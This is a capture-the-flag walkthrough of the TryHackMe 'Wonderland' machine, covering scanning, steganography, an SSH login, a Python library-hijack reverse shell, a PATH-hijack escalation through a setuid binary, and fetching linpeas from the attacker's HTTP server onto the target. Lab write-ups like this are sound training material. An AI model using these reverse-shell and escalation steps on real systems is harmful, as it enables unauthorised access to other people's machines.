TryHackMe - Wonderland


22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8e:ee:fb:96:ce:ad:70:dd:05:a9:3b:0d:b0:71:b8:63 (RSA)
|   256 7a:92:79:44:16:4f:20:43:50:a9:a8:47:e2:c2:be:84 (ECDSA)
|_  256 00:0b:80:44:e6:3d:4b:69:47:92:2c:55:14:7e:2a:c9 (ED25519)
80/tcp open  http    Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Follow the white rabbit.
No exact OS matches for host (If you know what OS is running on it, see ).
TCP/IP fingerprint:

Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 729.87 seconds

Port 80

  • Let's run Gobuster

└─# gobuster dir -u -w /usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url:           
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
2022/03/31 11:22:01 Starting gobuster in directory enumeration mode
/img                  (Status: 301) [Size: 0] [--> img/]
/poem                 (Status: 301) [Size: 0] [--> poem/]
/r                    (Status: 301) [Size: 0] [--> r/]   
2022/03/31 11:31:29 Finished
  • On /r we have nothing interesting

  • On /img there are some images

  • Let's modify our /etc/hosts and add this wonderland

  • Now we can use gobuster for subdomain enumeration as well (it does not five anything but it was worth a try)

  • Let's have a closer look to the images.

  • First lets take the rabbit one As it is written pretty much everywhere to follow the white rabbit.

└─# steghide --info white_rabbit_1.jpg         
  format: jpeg
  capacity: 99.2 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase: 
  embedded file "hint.txt":
    size: 22.0 Byte
    encrypted: rijndael-128, cbc
    compressed: yes
  • It asks for a passphrase but there is no need to enter anything you can just type enter.

  • And we can see that a hint is embeded in the image, lets extract it steghide --extract -sf white_rabbit_1.jpgsf will specify it is a stego file.

  • Here is the hint

└─# cat hint.txt     
follow the r a b b i t                                                                                                                                                                                                               

In our gobuster there was an r directory. So this probably means that r a b b i t is a path that we need to follow

  • If we look at the code of the last page we get what seems to be user:pass:

  • Let's try those on the ssh. It works:

  • If we check the hint for the user.txt it says everything is upside down so I tried to find a file called txt.resu but it was not it, then I realized as we have the root.txt in alice's folder maybe the user.txt is in a the root so I tried a cat /root/user.txt

  • And it worked!

  • Let's try to become root

Privilege Escalation

  • If we sudo -l using alice password, we get htis

alice@wonderland:~$ sudo -l
Matching Defaults entries for alice on wonderland:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User alice may run the following commands on wonderland:
    (rabbit) /usr/bin/python3.6 /home/alice/
  • If we l0ok at the python script it seems to show 10 of any sentence of the poem randomly

for i in range(10):
    line = random.choice(poem.split("\n"))
    print("The line was:\t", line)
  • Having the right to this specific file means that this the way to privesc.

  • It seems like we could hijack the python library. I found this really interesintg article that explains it pretty well

  • So our walrus script uses the library I modified it like this to get a reverse shell and I launched it as the user rabbit this way: sudo -u rabbit /usr/bin/python3.6 /home/alice/

from os import dup2
from subprocess import run
import socket
  • With a shell as rabbit we can now have a look at their home folder and we can see this file called teaParty. If we use file on it we get this result:

file teaParty
teaParty: setuid, setgid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/, for GNU/Linux 3.2.0, BuildID[sha1]=75a832557e341d3f65157c22fafd6d6ed7413474, not stripped

If we launch it it ends with a segfault

Probably by Thu, 31 Mar 2022 23:15:41 +0000

Welcome to the tea party!
The Mad Hatter will be here soon.
Ask very nicely, and I will give you some tea while you wait for him
Segmentation fault (core dumped)
  • Let's take a look at it from our attacking machine as we do not have a the strings function in the target machine

  • we can serve it using http server of python as it is installed in the machine python3.6 -m http.server 8888

  • When we look at it with strings we see this line:

/bin/echo -n 'Probably by ' && date --date='next hour' -R
  • So date is invoked without using the full path, we could certainly abuse this by putting a file called date and make it do something for us.

  • Now we serve it from our attacking machine with python and get it in our target

  • We have to make it executable with chmod +x

  • And we need to export rabbit's home as our path

export PATH=/home/rabbit:$PATH
echo $PATH
  • There are no specific file that caught our attention and sudo -l does not list anything so let's get linepeas and check out what we could do.

  • wget we run this in our attacking machine

  • We serve it using python server python3 -m http.server 80

  • We dowload it in our target wget

  • add it execution right with chmod +x and run it ./linpeas_linux_amd64

  • We are root and can read our last flag on alice's home!

Last updated